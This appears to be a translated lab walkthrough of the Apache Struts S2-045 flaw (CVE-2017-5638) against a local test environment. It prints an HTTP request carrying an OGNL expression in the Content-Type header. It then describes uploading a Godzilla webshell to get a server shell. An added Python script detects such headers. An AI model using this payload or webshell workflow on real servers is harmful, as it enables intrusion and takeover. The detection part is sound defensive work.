S2-045 Remote Code Execution Vulnerability (CVE-2017-5638)
Open the vulnerability environment
On the Ubuntu host, enter the directory of the corresponding vulnerability environment and start it:
Check that the environment started successfully
Once it has started, open the vulnerable environment in a browser at:
http://ip:8080
Next, try uploading any file, capture the request, modify it, and observe how the response changes.
Upload any file
Capture the request, modify it, and check the response received after the modification. Send the following request directly:
POST / HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close
Content-Length: 0
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('lc',123+123)}.multipart/form-data
We find that 123+123 has been evaluated and the result is shown in the response.
Packet capture
After sending to the repeater:
Modify the request and view the response
We observe that the expression 123+123 we entered has been evaluated
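From the defender's side, the request above is easy to recognise: a Content-Type header that begins with an OGNL expression ("%{...}") instead of a media type. The following Python script is an added example (not part of the original post) that parses a raw HTTP request and flags a Content-Type value carrying OGNL expression markers. The malicious sample is the request shown above; the benign sample and the indicator list are constructed for this example and should be tuned to your environment.

```python
import re

# Indicators that an OGNL expression has been placed in a header value.
# Constructed for this example from the payload shape shown above.
OGNL_INDICATORS = [
    re.compile(r"%\{"),                          # OGNL expression opener %{ ... }
    re.compile(r"\$\{"),                         # alternate opener ${ ... }
    re.compile(r"#context\b"),                   # access to the OGNL value-stack context
    re.compile(r"com\.opensymphony\.xwork2"),    # Struts/XWork class references
]


def parse_headers(raw_request: str) -> dict:
    """Return the headers of a raw HTTP request as a dict with lower-cased names."""
    text = raw_request.replace("\r\n", "\n")
    head = text.split("\n\n", 1)[0]
    headers = {}
    for line in head.split("\n")[1:]:  # skip the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def ognl_in_value(value: str) -> bool:
    """True if the header value contains any OGNL indicator."""
    return any(p.search(value) for p in OGNL_INDICATORS)


def scan_request(raw_request: str) -> dict:
    """Return {header_name: value} for headers that look like S2-045 style injection."""
    headers = parse_headers(raw_request)
    hits = {}
    content_type = headers.get("content-type", "")
    if ognl_in_value(content_type):
        hits["content-type"] = content_type
    return hits


# The request from the walkthrough above (harmless 123+123 probe).
MALICIOUS = "\r\n".join([
    "POST / HTTP/1.1",
    "Host: localhost:8080",
    "Connection: close",
    "Content-Length: 0",
    "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher."
    "HttpServletResponse'].addHeader('lc',123+123)}.multipart/form-data",
]) + "\r\n\r\n"

# A constructed, normal multipart upload request for comparison.
BENIGN = "\r\n".join([
    "POST /upload HTTP/1.1",
    "Host: localhost:8080",
    "Connection: close",
    "Content-Length: 0",
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123",
]) + "\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(label, scan_request(req))
```

The same check can be run over a web-server access log or a WAF capture; any Content-Type value that does not start with a plain media type and contains "%{" is worth an alert, since a legitimate multipart boundary never needs an OGNL expression.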
Now that the expression has been evaluated, we use third-party tools to generate a Trojan (webshell) file, upload an arbitrary file to run vulnerability detection, then upload the Trojan file and obtain a shell on the server.
Tools: Godzilla, Struts2 vulnerability detection tool
Open Godzilla and generate a Trojan:
View Trojan files
Try uploading an arbitrary file and watch how the URL changes
After uploading, note this URL
Copy this URL and scan it with a third-party tool
Tool: Struts2 vulnerability scanning tool
View the scan results: the vulnerability is present
Verify the vulnerability
Remote command execution
View the contents of the root directory
Click the file upload module and try to upload the Trojan file
Check whether the upload succeeded; we observe that it has
Note the access path of the uploaded file, copy it, and connect using a third-party tool (Godzilla)
Connect via Godzilla
The connection succeeds; add the entry, open it, and the server shell is obtained
Added successfully
Click to enter and the shell is obtained
Any operation can now be performed on the files:
If the article is inappropriate, criticism and correction are welcome!